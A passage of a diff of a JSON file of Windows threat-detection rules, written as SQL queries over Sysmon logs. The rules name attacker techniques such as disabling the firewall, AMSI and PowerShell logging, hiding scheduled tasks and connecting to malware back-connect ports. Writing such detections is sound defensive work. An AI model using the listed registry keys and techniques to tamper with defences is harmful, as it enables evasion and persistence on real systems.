= 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" ], - "filename": "registry_set_disable_windows_firewall.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Disable Microsoft Defender Firewall via Registry", - "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", "status": "test", - "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", - "author": "frack113", + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_defender_firewall.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Office Autorun Keys Modification", - "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ "attack.persistence", "attack.t1547.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_office.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Legitimate administrators removing applications (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "title": "Removal Of Index Value to Hide Schedule Task - Registry", + "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1070", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Activate Suppression of Windows Security Center Notifications", - "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "title": "Removal Of SD Value to Hide Schedule Task - Registry", + "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", "status": "experimental", - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "author": "frack113", + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" ], - "filename": "registry_set_suppress_defender_notifications.yml" + "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" }, { - "title": "System Scripts Autorun Keys Modification", - "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "title": "Removal of Potential COM Hijacking Registry Keys", + "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\installer.exe' ESCAPE '\\') OR (Image LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (Image LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" + "filename": "registry_delete_removal_com_hijacking_registry_key.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "status": "test", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", - "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "title": "Suspicious Typical Malware Back Connect Ports", + "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "status": "test", + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((Image LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_malware_backconnect_ports.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", - "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "CurrentVersion Autorun Keys Modification", - "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate script" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((Details = '(Empty)' OR TargetObject LIKE 